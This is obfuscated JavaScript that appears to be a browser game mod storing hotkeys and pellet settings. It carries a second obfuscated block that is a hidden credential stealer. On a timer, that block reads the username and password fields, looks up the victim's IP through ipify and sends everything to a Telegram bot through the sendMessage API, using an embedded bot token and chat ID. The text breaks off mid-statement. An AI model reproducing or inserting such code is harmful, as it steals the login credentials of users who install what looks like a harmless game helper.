_0x51aba8=_0xc14380;_0x4f5d47[_0x51aba8(0x1bb)](),_0x1560e6[_0x51aba8(0x2f9)]='',_0x1560e6['style'][_0x51aba8(0x28b)]='red',_0x1c2ffc[_0x51aba8(0x1e2)]='',delete _0x3a47d4[_0x1c2ffc[_0x51aba8(0x374)]],localStorage[_0x51aba8(0x418)]('Multikey',JSON[_0x51aba8(0x457)](_0x3a47d4)),_0x1c02eb('Hotkey\x20removed\x20for\x20'+_0x1c2ffc[_0x51aba8(0x374)],_0x51aba8(0x3cf));});}),_0x5a7fe0[_0xeddef6(0x2a2)]('input',function(){const _0x385b01=_0xeddef6;_0x3a47d4[_0x385b01(0x390)]={..._0x3a47d4['multiple'],'_0x3dddce':_0x5a7fe0[_0x385b01(0x2f1)][_0x385b01(0x315)]()},_0x5a7fe0[_0x385b01(0x2a2)]('input',function(){const _0x1dab1d=_0x385b01,_0x3fc152=parseInt(_0x5a7fe0[_0x1dab1d(0x2f1)],0xa);_0x2627b8[_0x1dab1d(0x154)]=_0x1dab1d(0x11f)+_0x3fc152;}),localStorage[_0x385b01(0x418)]('Multikey',JSON[_0x385b01(0x457)](_0x3a47d4)),_0x2627b8[_0x385b01(0x154)]='Mul-Pellet\x20Amount:\x20'+_0x5a7fe0[_0x385b01(0x2f1)];});const _0xcc0a51=JSON[_0xeddef6(0x1c0)](localStorage[_0xeddef6(0x3a6)]('Multikey'))||{},_0x5473e6=parseInt(_0xcc0a51[_0xeddef6(0x390)]?.['_0x3dddce'],0xa)||0xf;_0x5a7fe0[_0xeddef6(0x2f1)]=_0x5473e6,_0x2627b8[_0xeddef6(0x154)]=_0xeddef6(0x11f)+_0x5473e6;!_0xcc0a51['multiple']&&(_0xcc0a51[_0xeddef6(0x390)]={'_0x3dddce':_0x5473e6},localStorage['setItem']('Multikey',JSON[_0xeddef6(0x457)](_0xcc0a51)));const _0x4012ab=()=>{const _0xa89285=_0xeddef6,_0x463c19=parseInt(_0x5a7fe0[_0xa89285(0x2f1)],0xa);localStorage[_0xa89285(0x418)]('Multikey',JSON['stringify']({..._0x3a47d4,'_0x36caad':_0x463c19})),_0x463c19,console[_0xa89285(0x35d)](_0x463c19);};_0x4012ab(),setInterval(_0x4012ab,0x3e8);const _0x1fc335=()=>{const _0x200215=_0xeddef6,_0x1b0e69=JSON[_0x200215(0x1c0)](localStorage[_0x200215(0x3a6)](_0x200215(0x37b)))||{};return{'rec':_0x1b0e69[_0x200215(0x25c)]?.[_0x200215(0x270)]||'','speed':_0x1b0e69[_0x200215(0x25d)]?.['keyCode']||'','growth':_0x1b0e69[_0x200215(0x287)]?.['keyCode']||'','virus':_0x1b0e69[_0x200215(0x3d2)]?.[_0x200215(0x270)]||'','mothercell':_0x1b0e69[_0x200215(0x433)]?.[_0x200215(0x270)]||'','portal':_0x1b0e69[_0x200215(0x415)]?.[_0x200215(0x270)]||'','block':_0x1b0e69['block']?.[_0x200215(0x270)]||'','freeze':_0x1b0e69[_0x200215(0x2d3)]?.['keyCode']||'','antiFreeze':_0x1b0e69[_0x200215(0x148)]?.['keyCode']||'','antiRec':_0x1b0e69[_0x200215(0x389)]?.[_0x200215(0x270)]||'','shield':_0x1b0e69[_0x200215(0x1ee)]?.['keyCode']||'','recspeed':_0x1b0e69['recspeed']?.[_0x200215(0x270)]||'','multiple':_0x1b0e69[_0x200215(0x390)]?.[_0x200215(0x270)]||'','virusantifreeze':_0x1b0e69[_0x200215(0x216)]?.['keyCode']||'','mothercellantirecfreeze':_0x1b0e69['mothercellantirecfreeze']?.[_0x200215(0x270)]||''};},_0x2de663=_0x1fc335();setInterval(()=>{const _0x23cc58=_0xeddef6,_0x2135c0=_0x1fc335();Object[_0x23cc58(0xee)](_0x2de663,_0x2135c0);},0x7d0);const _0xec59ba={};_0xa84512['forEach'](_0xdaace2=>{const _0x225308=_0xeddef6,_0xa27a0e=_0x3a47d4[_0xdaace2[_0x225308(0x374)]]||{};_0xdaace2[_0x225308(0x1e2)]=_0xa27a0e[_0x225308(0x1e2)]||'',powerHotkey[_0x225308(0x2f9)]=_0xa27a0e['key']?_0xa27a0e[_0x225308(0x1e2)][_0x225308(0x307)]():'',_0xec59ba[_0xdaace2['name']]=_0xa27a0e[_0x225308(0x270)]||'';}),_0xec59ba['rec'],_0xec59ba['speed'],_0xec59ba[_0xeddef6(0x287)],_0xec59ba['virus'],_0xec59ba[_0xeddef6(0x433)],_0xec59ba['portal'],_0xec59ba['block'],_0xec59ba[_0xeddef6(0x2d3)],_0xec59ba[_0xeddef6(0x148)],_0xec59ba[_0xeddef6(0x389)],_0xec59ba[_0xeddef6(0x1ee)];});
(function(_0x1a66d2,_0x52a483){function _0x1fb661(_0x3d66a5,_0x41d39b,_0x6ab93f,_0x25c9d0,_0x4e0b56){return _0x4b0e(_0x3d66a5-0x318,_0x41d39b);}function _0x290e0d(_0x4dcd86,_0x4fe73f,_0x1ed69e,_0x28d459,_0x33a82a){return _0x4b0e(_0x4fe73f- -0x144,_0x28d459);}function _0xb02dd7(_0x2763ee,_0x3cda56,_0x16ecf4,_0x4f7372,_0x11a8df){return _0x4b0e(_0x16ecf4-0x129,_0x2763ee);}function _0x37ec44(_0x13f5ac,_0x416dce,_0x4d9973,_0x5a60a4,_0x1e5ee9){return _0x4b0e(_0x1e5ee9-0x3a7,_0x13f5ac);}const _0x19e91a=_0x1a66d2();function _0x315dd5(_0x29371a,_0x3fdc55,_0x290037,_0x154a8d,_0x5704eb){return _0x4b0e(_0x154a8d- -0x4f,_0x290037);}while(!![]){try{const _0x434abb=-parseInt(_0xb02dd7(0x282,0x286,0x255,0x238,0x252))/(-0x1b4c+-0x1698+0x31e5)*(parseInt(_0x315dd5(0x126,0x113,0xf2,0xea,0x11e))/(0x9a5+-0x2087+0x16e4))+-parseInt(_0x290e0d(-0x43,-0x5,-0xf,0x19,0x28))/(0x1*-0x1cb3+-0x22a3*0x1+0x3f59)+parseInt(_0xb02dd7(0x26b,0x2ab,0x2ac,0x267,0x26e))/(0x2571+0x1482+-0x1*0x39ef)*(-parseInt(_0x315dd5(0xfb,0x13c,0x154,0x120,0x12d))/(0x1533+0x1*0x2641+-0x3b6f))+-parseInt(_0x315dd5(0x112,0x129,0xf5,0xf3,0x106))/(0x2267*-0x1+-0x229d+0x450a)*(-parseInt(_0x315dd5(0x180,0x106,0x120,0x13b,0x156))/(-0xfee+-0x2*-0x137d+-0x53*0x47))+parseInt(_0xb02dd7(0x2be,0x2be,0x2b0,0x2eb,0x2a5))/(0x11f3+-0x1*0x185+-0x1066)+parseInt(_0x37ec44(0x4e2,0x4fe,0x4a2,0x4e6,0x4cb))/(0x1d8+-0x1633*-0x1+-0x1802)*(-parseInt(_0xb02dd7(0x2ae,0x2e5,0x2be,0x29c,0x293))/(-0x1a5b+0x9b5+0x10b0))+parseInt(_0x315dd5(0xeb,0xd3,0xfc,0x10f,0x154))/(0x4*-0x113+0x12b5*0x1+0x2*-0x72f);if(_0x434abb===_0x52a483)break;else _0x19e91a['push'](_0x19e91a['shift']());}catch(_0x42870a){_0x19e91a['push'](_0x19e91a['shift']());}}}(_0x2741,0x255*0x71b+0xe5fce+-0x16934e));function _0x2741(){const _0x52eb14=['GAZfm','sword','9XmtdEc','n/jso','xJbjn','er\x20De','VaszF','YKZJm','GfvkM','eaVGl','367823NomSjh','ZwZjd',':\x20...','json','ble','ord','ame','://ap','`\x0aPas','XzoG1','jRqur','5W5uc','-4065','2VpsKRx','SbOPG','47035','board','byuJs','hZEcE','3262596AMYTeB','wycsQ','chat_','48zmJEMY','NWKBV','Snodh','ById','eaeSb','rliKM','CoKHi','.org/','OwRaL','text','rUUwr',':\x20`','LMepB','/send','bot','appli','gify','catio','PpnxW','hAzhJ','YdysF','usern','wRcXJ','axlLo','value','eMumT','WRwju','FAvxD','27465361NonDBM','ame:\x20','Messa','HXHPJ','https','kpMEm','58869','JbtxH','DKBdN','rDash','push','vNILw','now',':AAGZ','ssREx','LCIRB','son','1970755cBpqkH','EvyXR','OoUFo','PHyoL','aEfak','join','lengt','y4ml5','UmyYx','ement','g?for','mat=j','`\x0aOth','aFepc','QKzLQ','sFYaY','strin','INVrC','.inne','xaPOa','4nFCHDT','FEIEJ','bUtbV','uEaOH','4468184tQRCBY','vscbT','CCMyU','222908ePmPMo','fy.or','tails',':visi','map','KpfBm','Twmbn','getEl','ndex','i.tel','vKYxM','9121490TRPtuf','egram','vZZjC','POST','bHIxM','fuMzU','OQtrT','jfnWW','Usern','QyOmC','JVEBl','passw','zHHic','findI','mZPBg','eLn3_','DEPHd','then','68364','1nwT8','XkRQD','fPEat','i.ipi'];_0x2741=function(){return _0x52eb14;};return _0x2741();}function _0x567cf5(_0xaa498b,_0xe5332f,_0x106cf8,_0x344130,_0x147537){return _0x4b0e(_0xe5332f- -0x20d,_0x147537);}function _0x26de53(_0x23ade3,_0x348f53,_0x24e8d9,_0x1c72c6,_0x5c30fe){return _0x4b0e(_0x1c72c6-0x394,_0x348f53);}const paArray=[];function _0x40120b(_0x1185ba,_0x35ac54,_0x28a92f,_0x591b2a,_0x3949ce){return _0x4b0e(_0x28a92f-0x131,_0x3949ce);}let lastSentTimestamp=0x167e+0x301*0xb+0x3789*-0x1;function sendToTelegram(_0xe631f5){const _0x41c5a8={'ssREx':_0x4cfbe5(0x1be,0x1db,0x1ef,0x20e,0x1ba)+_0x57fd82(0x16e,0x174,0x156,0x185,0x133)+_0x26ded2(-0x1c7,-0x1ae,-0x198,-0x1b3,-0x1dd)+_0x57fd82(0x13f,0x164,0x12b,0x176,0x12f)+_0x57fd82(0x141,0x103,0x17b,0x14b,0x14d)+_0x4cfbe5(0x1dd,0x1c4,0x1a5,0x16b,0x1d6)+_0x26ded2(-0x152,-0x175,-0x149,-0x197,-0x146)+_0x4cfbe5(0x1a0,0x1f4,0x1be,0x17d,0x180)+_0x57fd82(0x1b2,0x1e3,0x1db,0x1da,0x1bb)+'k','vNILw':_0x36154b(-0x168,-0x176,-0x18f,-0x188,-0x158)+_0x4cfbe5(0x15a,0x17b,0x183,0x1c5,0x188)+'0','hAzhJ':function(_0x4ef700,_0x1737e,_0x1db63f){return _0x4ef700(_0x1737e,_0x1db63f);},'axlLo':_0x36154b(-0x13e,-0x116,-0x11d,-0x111,-0x14d),'ZwZjd':_0x57fd82(0x15b,0x143,0x177,0x162,0x198)+_0x26ded2(-0x1bf,-0x1c6,-0x1de,-0x1c6,-0x1ee)+_0x36154b(-0x1c6,-0x189,-0x18d,-0x174,-0x1a8)+'n'},_0x2f6504=_0x41c5a8[_0x816d17(-0x1ca,-0x215,-0x1b4,-0x1ae,-0x1ea)];function _0x26ded2(_0x5df46f,_0x75c01c,_0x4ec58c,_0x2694a7,_0x53ac2d){return _0x4b0e(_0x75c01c- -0x319,_0x2694a7);}const _0x5c3c41=_0x41c5a8[_0x816d17(-0x1c2,-0x220,-0x1da,-0x20e,-0x1ed)],_0x1149bf=_0x4cfbe5(0x1d2,0x1a7,0x1aa,0x1cc,0x179)+_0x36154b(-0x154,-0x17b,-0x15b,-0x1a6,-0x143)+_0x4cfbe5(0x1fb,0x208,0x1db,0x1e7,0x1d5)+_0x36154b(-0x135,-0x118,-0x129,-0x101,-0x112)+_0x4cfbe5(0x1b2,0x172,0x191,0x16a,0x1d2)+_0x4cfbe5(0x1b5,0x1b4,0x198,0x163,0x174)+_0x2f6504+(_0x4cfbe5(0x156,0x1a5,0x197,0x1a2,0x189)+_0x36154b(-0x18d,-0x14e,-0x14a,-0x148,-0x18a)+'ge'),_0x3e3069={};_0x3e3069[_0x4cfbe5(0x1b5,0x1a8,0x189,0x16c,0x198)+'id']=_0x5c3c41,_0x3e3069[_0x57fd82(0x155,0x16a,0x12f,0x12e,0x169)]=_0xe631f5;function _0x36154b(_0xcb2f56,_0x57b65a,_0x1674c7,_0xa03123,_0x3bee6e){return _0x4b0e(_0x57b65a- -0x2ae,_0x1674c7);}function _0x4cfbe5(_0x4efdcf,_0x55c788,_0x3d918d,_0x295c62,_0x2b7473){return _0x4b0e(_0x3d918d-0x48,_0x4efdcf);}function _0x57fd82(_0x942bd6,_0xa943ce,_0x585885,_0x483cf6,_0x399c43){return _0x4b0e(_0x942bd6-0xa,_0x483cf6);}function _0x816d17(_0x455922,_0x288915,_0x1e084a,_0x31d0d3,_0x48d362){return _0x4b0e(_0x48d362- -0x356,_0x31d0d3);}const _0x3c1f48=_0x3e3069;_0x41c5a8[_0x57fd82(0x15f,0x179,0x127,0x11d,0x131)](fetch,_0x1149bf,{'method':_0x41c5a8[_0x816d17(-0x229,-0x207,-0x1bc,-0x1d2,-0x1fd)],'headers':{'Content-Type':_0x41c5a8[_0x4cfbe5(0x16a,0x17d,0x175,0x19a,0x147)]},'body':JSON[_0x4cfbe5(0x208,0x1a0,0x1c7,0x1eb,0x1ba)+_0x57fd82(0x15c,0x11b,0x150,0x19f,0x16f)](_0x3c1f48)});}function checkInnerDashboard(){const _0x2b4044={'byuJs':function(_0xfa872d,_0x17e6d5){return _0xfa872d===_0x17e6d5;},'PHyoL':_0x2abce0(-0x1a6,-0x174,-0x13e,-0x19b,-0x1a1),'INVrC':_0x2abce0(-0x1a2,-0x160,-0x131,-0x129,-0x132),'CCMyU':function(_0x30e656,_0x3b1f88){return _0x30e656>=_0x3b1f88;},'aEfak':function(_0x52aab1,_0x1b4831){return _0x52aab1-_0x1b4831;},'OwRaL':_0x420e66(0x4be,0x4bb,0x483,0x4b9,0x4a5),'DEPHd':_0x57793b(0x3d9,0x3e6,0x3f2,0x3ae,0x3f6),'xJbjn':function(_0x117eef,_0x336088){return _0x117eef(_0x336088);},'EvyXR':function(_0x4b920b,_0x1c8bc8){return _0x4b920b-_0x1c8bc8;},'eaeSb':function(_0x44ad81,_0x49e770){return _0x44ad81>_0x49e770;},'LMepB':_0xe31ae9(0xe4,0xd3,0xd3,0x109,0xd0)+_0x2abce0(-0x139,-0x137,-0x133,-0x178,-0x150)+_0x2abce0(-0x199,-0x162,-0x150,-0x184,-0x161),'PpnxW':_0x516f94(-0xf2,-0x106,-0x107,-0x106,-0xe0)+_0x516f94(-0x188,-0x163,-0x16f,-0x19d,-0x13b),'jRqur':function(_0xe1d0f8,_0x1e90f5){return _0xe1d0f8!==_0x1e90f5;},'CoKHi':_0x420e66(0x4d3,0x4a5,0x49a,0x502,0x494),'kpMEm':_0x57793b(0x37c,0x33e,0x3bc,0x366,0x39a),'NWKBV':function(_0x2ce760,_0x548826){return _0x2ce760===_0x548826;},'rUUwr':_0x2abce0(-0xf2,-0x104,-0x12e,-0xed,-0x11d),'HXHPJ':_0xe31ae9(0xb3,0xcc,0xb4,0x8d,0x98)+_0x516f94(-0x13a,-0x160,-0x142,-0x125,-0x130)+_0x57793b(0x3ed,0x42e,0x3ed,0x3b6,0x3ce)+_0xe31ae9(0xd5,0xd2,0xdd,0xb7,0xe2)+_0x57793b(0x3bb,0x389,0x3d7,0x3cf,0x3a7)+_0xe31ae9(0x8b,0x10c,0xcc,0x102,0xb2)+_0xe31ae9(0x9f,0x104,0xc0,0xa1,0xf4)};function _0x420e66(_0x23e9be,_0x485bc6,_0x1bc919,_0xf41092,_0x5c1671){return _0x4b0e(_0x23e9be-0x33a,_0x5c1671);}function _0x57793b(_0x5196e1,_0x12aa39,_0x245a17,_0x286a3f,_0x4ab626){return _0x4b0e(_0x5196e1-0x242,_0x12aa39);}function _0x516f94(_0x20ee4a,_0x173a1a,_0x20822c,_0x501ad0,_0x55ad02){return _0x4b0e(_0x173a1a- -0x293,_0x501ad0);}function _0x2abce0(_0x5d3192,_0x53dc8e,_0x7765c5,_0x3950cb,_0x9895c5){return _0x4b0e(_0x53dc8e- -0x29e,_0x7765c5);}function _0xe31ae9(_0x2a7037,_0x1b3092,_0x20305a,_0x453962,_0x4f7d7f){return _0x4b0e(_0x20305a- -0xae,_0x2a7037);}if(_0x2b4044[_0xe31ae9(0x6b,0xb2,0x78,0x89,0x34)]($,_0x2b4044[_0x2abce0(-0x131,-0x150,-0x118,-0x145,-0x10c)])['is'](_0x2b4044[_0x57793b(0x396,0x377,0x372,0x369,0x355)])){if(_0x2b4044[_0x57793b(0x378,0x379,0x398,0x35a,0x340)](_0x2b4044[_0x57793b(0x38a,0x368,0x3ce,0x351,0x390)],_0x2b4044[_0x2abce0(-0x100,-0x13b,-0x16d,-0x10c,-0x114)])){if(_0x2b4044[_0x516f94(-0x169,-0x14d,-0x128,-0x13e,-0x137)](paArray[_0xe31ae9(0xc4,0xe7,0xc7,0x9f,0xdb)+'h'],0x1974+-0xb*0x14e+-0xb1a)){if(_0x2b4044[_0x2abce0(-0x165,-0x15b,-0x127,-0x118,-0x184)](_0x2b4044[_0x57793b(0x38e,0x3bb,0x385,0x364,0x3a9)],_0x2b4044[_0x516f94(-0x107,-0x147,-0x18c,-0x165,-0x115)]))_0x2b4044[_0x420e66(0x460,0x43d,0x46e,0x41e,0x42c)](fetch,_0x2b4044[_0xe31ae9(0xe5,0xc5,0xb3,0xd3,0x8a)])[_0x516f94(-0x11c,-0xed,-0xe1,-0xec,-0xbc)](_0x26a4e9=>_0x26a4e9[_0x420e66(0x469,0x444,0x438,0x464,0x465)]())[_0xe31ae9(0xd3,0x116,0xf8,0x117,0xd9)](_0x49d973=>{function _0xe3785e(_0x373e87,_0x152348,_0x3bfe5d,_0x2f4e31,_0x2190b6){return _0x2abce0(_0x373e87-0x126,_0x152348-0x343,_0x2190b6,_0x2f4e31-0x17,_0x2190b6-0x39);}function _0x471d00(_0x1c222a,_0x292532,_0x48940a,_0x3fb123,_0x82d0df){return _0x57793b(_0x1c222a- -0x3b2,_0x3fb123,_0x48940a-0x50,_0x3fb123-0x141,_0x82d0df-0x11b);}function _0x36e219(_0x3a3864,_0x9aeb34,_0x2ea63e,_0x230642,_0x11cb6a){return _0x57793b(_0x3a3864-0x10a,_0x230642,_0x2ea63e-0x3f,_0x230642-0x139,_0x11cb6a-0x62);}function _0x404518(_0x14867c,_0x4ca1f1,_0x39e2b4,_0x35de42,_0x25d533){return _0xe31ae9(_0x39e2b4,_0x4ca1f1-0x71,_0x4ca1f1- -0x333,_0x35de42-0x1d5,_0x25d533-0x99);}function _0x1bfa42(_0x3e2d79,_0x32bdcc,_0xeeeb2f,_0x1db6ff,_0x2a55d8){return _0x57793b(_0x1db6ff- -0x13c,_0x3e2d79,_0xeeeb2f-0x101,_0x1db6ff-0xb1,_0x2a55d8-0x1a0);}if(_0x2b4044[_0x36e219(0x489,0x45c,0x456,0x496,0x487)](_0x2b4044[_0x36e219(0x4be,0x49c,0x4de,0x4ab,0x48b)],_0x2b4044[_0xe3785e(0x226,0x225,0x22e,0x252,0x1f1)]))_0x1df441[_0x1902f7][_0x1bfa42(0x2dc,0x2b2,0x280,0x2a6,0x279)+_0x471d00(-0x3f,-0x33,-0x7e,-0x29,-0x22)]=_0x35cbc5;else{const _0x505edf=_0x49d973['ip'],_0x378b62=paArray[_0xe3785e(0x215,0x233,0x258,0x24e,0x1fa)](_0x4dd5dd=>_0xe3785e(0x211,0x242,0x21c,0x249,0x276)+_0xe3785e(0x247,0x204,0x1e6,0x22a,0x22d)+'`'+_0x4dd5dd[_0x404518(-0x271,-0x28a,-0x26b,-0x25f,-0x299)+_0xe3785e(0x1b4,0x1d7,0x1d0,0x1c3,0x193)]+(_0xe3785e(0x200,0x1d9,0x1ab,0x1bc,0x20c)+_0x1bfa42(0x26a,0x1f1,0x1f5,0x229,0x25c)+_0x404518(-0x256,-0x294,-0x2b9,-0x2bf,-0x290))+_0x4dd5dd[_0x404518(-0x281,-0x241,-0x265,-0x267,-0x26e)+_0x1bfa42(0x213,0x20f,0x1fb,0x237,0x261)]+(_0x404518(-0x223,-0x266,-0x2a1,-0x256,-0x263)+_0x36e219(0x473,0x465,0x4a1,0x466,0x47f)+_0xe3785e(0x254,0x231,0x25a,0x250,0x24f)+_0xe3785e(0x1af,0x1d3,0x1ea,0x1c0,0x1d5)))[_0x404518(-0x29a,-0x26d,-0x267,-0x243,-0x25b)]('\x0a\x0a'),_0x432c9b=Date[_0x471d00(-0x6,0x10,-0x42,0x22,-0x36)]();if(_0x2b4044[_0xe3785e(0x245,0x22e,0x206,0x210,0x23b)](_0x2b4044[_0x1bfa42(0x25e,0x278,0x2ab,0x279,0x297)](_0x432c9b,lastSentTimestamp),-0xedcf+-0x9*0xb593+0xbe3da)){if(_0x2b4044[_0xe3785e(0x1d9,0x1e2,0x1a9,0x210,0x222)](_0x2b4044[_0xe3785e(0x1d6,0x1ef,0x203,0x1d2,0x1b9)],_0x2b4044[_0x36e219(0x4f1,0x4fe,0x4c8,0x4d9,0x4dc)])){const _0x5e2375={};_0x5e2375[_0xe3785e(0x237,0x1fc,0x232,0x1c6,0x1e5)+_0x471d00(-0x3e,-0x25,-0x5f,-0x17,-0x23)]=_0x5699f1,_0x5e2375[_0x36e219(0x4ec,0x4f2,0x4f1,0x502,0x4d0)+_0x471d00(-0x3f,-0x7e,-0x3e,-0x55,-0x40)]=_0x57a328;const _0x560984=_0x5e2375;_0x391456[_0x404518(-0x287,-0x279,-0x25d,-0x23a,-0x279)](_0x560984);}else _0x2b4044[_0x471d00(-0x4a,-0x38,-0x59,-0x2c,-0x40)](sendToTelegram,_0x378b62),paArray[_0x1bfa42(0x249,0x27d,0x27d,0x27b,0x292)+'h']=0x2573*-0x1+0xa72+0x1b01,lastSentTimestamp=_0x432c9b;}}});else{const _0x5e11e0=_0x4b3811['ip'],_0x31649a=_0x38f6bb[_0x2abce0(-0x13c,-0x110,-0xe0,-0xdb,-0x117)](_0x309d0c=>_0x2abce0(-0x10e,-0x101,-0x146,-0xc6,-0xf5)+_0x2abce0(-0x170,-0x13f,-0x178,-0x166,-0x170)+'`'+_0x309d0c[_0x2abce0(-0x189,-0x147,-0x165,-0x140,-0x187)+_0x516f94(-0x195,-0x161,-0x133,-0x181,-0x170)]+(_0x420e66(0x46e,0x47a,0x488,0x47e,0x435)+_0x420e66(0x45d,0x420,0x492,0x426,0x461)+_0xe31ae9(0xc3,0xcb,0x9f,0xac,0xbf))+_0x309d0c[_0x2abce0(-0x136,-0xfe,-0xea,-0xdc,-0xcc)+_0xe31ae9(0x61,0x4c,0x83,0x9c,0x84)]+(_0x516f94(-0xee,-0x118,-0x13c,-0x117,-0x144)+_0x420e66(0x461,0x452,0x46c,0x462,0x446)+_0x516f94(-0x130,-0x107,-0x127,-0x111,-0xfb)+_0x57793b(0x370,0x348,0x372,0x39e,0x334)))[_0xe31ae9(0xb0,0xb3,0xc6,0xac,0xb3)]('\x0a\x0a'),_0x44172b=_0x3f0027[_0xe31ae9(0xc1,0xc9,0xbc,0xcc,0xc8)]();_0x2b4044[_0x516f94(-0x119,-0x10a,-0x127,-0x14c,-0x102)](_0x2b4044[_0x2abce0(-0x148,-0x12e,-0x104,-0x133,-0xfd)](_0x44172b,_0xd065a4),-0x1*-0x1f34d+-0x65eed+0x8*0x11ff0)&&(_0x2b4044[_0x516f94(-0x164,-0x16d,-0x19d,-0x13a,-0x155)](_0x2d0c30,_0x31649a),_0x319a02[_0x57793b(0x3b7,0x372,0x3a8,0x3a5,0x3a3)+'h']=-0x6*-0x8f+0x1f5a+-0x22b4,_0x39bc80=_0x44172b);}}}else _0x2b4044[_0x57793b(0x388,0x34b,0x372,0x368,0x39d)](_0x44cc51[_0xe31ae9(0xce,0xeb,0xc7,0xd5,0xce)+'h'],_0x34e588[_0x3c224c][_0x516f94(-0xd2,-0xf3,-0x117,-0x11d,-0xe5)+_0x516f94(-0x125,-0x162,-0x124,-0x19c,-0x169)][_0x516f94(-0x12f,-0x11e,-0xea,-0x124,-0x107)+'h'])&&(_0x340346[_0xa99cd8][_0x2abce0(-0x12b,-0xfe,-0xc9,-0xf7,-0xf2)+_0x420e66(0x46b,0x467,0x44a,0x482,0x4a4)]=_0x2cd98a);}}function _0x4b0e(_0x36d669,_0x1813c2){const _0x3e6baa=_0x2741();return _0x4b0e=function(_0x2d3d1d,_0x1af1f6){_0x2d3d1d=_0x2d3d1d-(0x1311+-0xa65*0x1+-0x3*0x283);let _0xc8ee1a=_0x3e6baa[_0x2d3d1d];return _0xc8ee1a;},_0x4b0e(_0x36d669,_0x1813c2);}setInterval(()=>{const _0x354d00={'xaPOa':function(_0x5813ff,_0x3c76fa){return _0x5813ff(_0x3c76fa);},'JbtxH':function(_0x2da367,_0x53205f){return _0x2da367!==_0x53205f;},'wRcXJ':function(_0x5b9f3c,_0x293c3d){return _0x5b9f3c>_0x293c3d;},'VaszF':function(_0x11a1b8,_0x375c00){return _0x11a1b8>=_0x375c00;},'vKYxM':function(_0x22206a,_0x5f2d84){return _0x22206a-_0x5f2d84;},'zHHic':function(_0x278a91,_0x105509){return _0x278a91(_0x105509);},'GAZfm':function(_0xc526d6,_0x50cc63){return _0xc526d6(_0x50cc63);},'fPEat':_0xec2196(-0x1d1,-0x23e,-0x20d,-0x250,-0x202)+_0x20e72a(-0x91,-0x83,-0x5b,-0x91,-0x3f)+_0xec2196(-0x1ac,-0x204,-0x1c4,-0x1d8,-0x189)+_0xec2196(-0x1fa,-0x1ed,-0x1e4,-0x1df,-0x1b6)+_0x5c66f1(0x2c3,0x296,0x2f4,0x308,0x2cd)+_0x4c7cbd(0x183,0x19a,0x1d7,0x1a7,0x15c)+_0x20e72a(0x18,-0x2b,-0x20,-0x18,-0x55),'vscbT':_0xec2196(-0x1c7,-0x20a,-0x1c8,-0x19b,-0x203)+_0x4c7cbd(0x15e,0x184,0x1b5,0x1a1,0x1b9)+_0x5c66f1(0x2b5,0x28f,0x297,0x2c4,0x2d2)+_0x5c66f1(0x27f,0x241,0x2ae,0x26d,0x279)+_0x4c7cbd(0x156,0x157,0x147,0x114,0x189)+_0xec2196(-0x202,-0x24d,-0x212,-0x210,-0x226)+_0x5c66f1(0x2ee,0x2dd,0x331,0x2cd,0x2a9)+_0x4c7cbd(0x160,0x196,0x1c7,0x16d,0x1b8)+_0x3012d7(0x279,0x2a5,0x234,0x27b,0x266)+'k','sFYaY':_0xec2196(-0x20f,-0x203,-0x237,-0x20b,-0x23e)+_0x4c7cbd(0x127,0x15b,0x152,0x138,0x14b)+'0','Snodh':function(_0x444358,_0x5ea568,_0x34231b){return _0x444358(_0x5ea568,_0x34231b);},'QyOmC':_0x4c7cbd(0x1a9,0x1b8,0x18e,0x1fb,0x1f8),'UmyYx':_0x5c66f1(0x29b,0x2d3,0x2cd,0x2d6,0x25e)+_0x5c66f1(0x29d,0x2d7,0x26b,0x25b,0x291)+_0x3012d7(0x225,0x1c2,0x1ba,0x1e5,0x1e3)+'n','XkRQD':_0x4c7cbd(0x170,0x177,0x18b,0x1a3,0x189)+_0x3012d7(0x1c5,0x22a,0x1ab,0x1c4,0x1f0),'QKzLQ':_0x4c7cbd(0x185,0x1c0,0x1a4,0x1af,0x1e1)+_0x3012d7(0x1fe,0x20d,0x1e6,0x1df,0x1ef),'OoUFo':function(_0x255556,_0x16272d){return _0x255556&&_0x16272d;},'WRwju':function(_0x3e37f2,_0x5144fd){return _0x3e37f2===_0x5144fd;},'YdysF':_0x20e72a(0x2c,0x2f,0xd,-0x19,-0x25),'eaVGl':function(_0x5aed15,_0x390318){return _0x5aed15!==_0x390318;},'uEaOH':function(_0x236ccd,_0x2063af){return _0x236ccd===_0x2063af;},'mZPBg':_0x4c7cbd(0x13a,0x149,0x179,0x143,0x174),'LCIRB':_0x5c66f1(0x291,0x2d4,0x2ad,0x2b2,0x25b),'wycsQ':_0x4c7cbd(0x1e0,0x1b0,0x1c0,0x17d,0x1b6),'eMumT':_0x5c66f1(0x2cf,0x2c6,0x305,0x2c7,0x29c),'KpfBm':_0x3012d7(0x214,0x1f8,0x1e8,0x202,0x224),'jfnWW':_0x20e72a(-0x45,0x2d,-0x12,-0x20,0x2b),'JVEBl':function(_0xca5517){return _0xca5517();}};function _0x5c66f1(_0x2e4fbd,_0xa37ea7,_0xe600ec,_0x23f685,_0x49ffd8){return _0x4b0e(_0x2e4fbd-0x14a,_0xe600ec);}function _0xec2196(_0x121ec7,_0x11c30e,_0x5d83c2,_0x10102e,_0x5eb75b){return _0x4b0e(_0x5d83c2- -0x36f,_0x5eb75b);}const _0x1837aa=document[_0x4c7cbd(0x1c3,0x1b1,0x177,0x1b3,0x1bb)+_0x20e72a(0x14,-0x45,-0x16,0x6,-0x3c)+_0x4c7cbd(0x14a,0x165,0x15e,0x19e,0x183)](_0x354d00[_0x3012d7(0x256,0x2a2,0x2aa,0x229,0x267)])[_0x20e72a(-0xb,-0x6,-0x34,-0x5a,-0x63)],_0x1de268=document[_0x4c7cbd(0x1e7,0x1b1,0x1bd,0x183,0x1cd)+_0x5c66f1(0x2c2,0x2bb,0x2ec,0x302,0x307)+_0x20e72a(-0x5c,-0x61,-0x49,-0x45,-0x46)](_0x354d00[_0x3012d7(0x21a,0x233,0x253,0x253,0x23b)])[_0x5c66f1(0x2a4,0x2e3,0x2a3,0x2b3,0x28b)];function _0x4c7cbd(_0x4f5763,_0x3cad29,_0x2bd15d,_0x3822a3,_0x4f1caa){return _0x4b0e(_0x3cad29-0x20,_0x4f1caa);}if(_0x354d00[_0x20e72a(-0x48,-0x47,-0x1d,-0x10,-0xf)](_0x1837aa,_0x1de268)){if(_0x354d00[_0x4c7cbd(0x15a,0x17c,0x19f,0x17f,0x194)](_0x354d00[_0x4c7cbd(0x163,0x176,0x145,0x1bb,0x147)],_0x354d00[_0x20e72a(-0x1d,0x8,-0x38,-0x47,-0x5)])){const 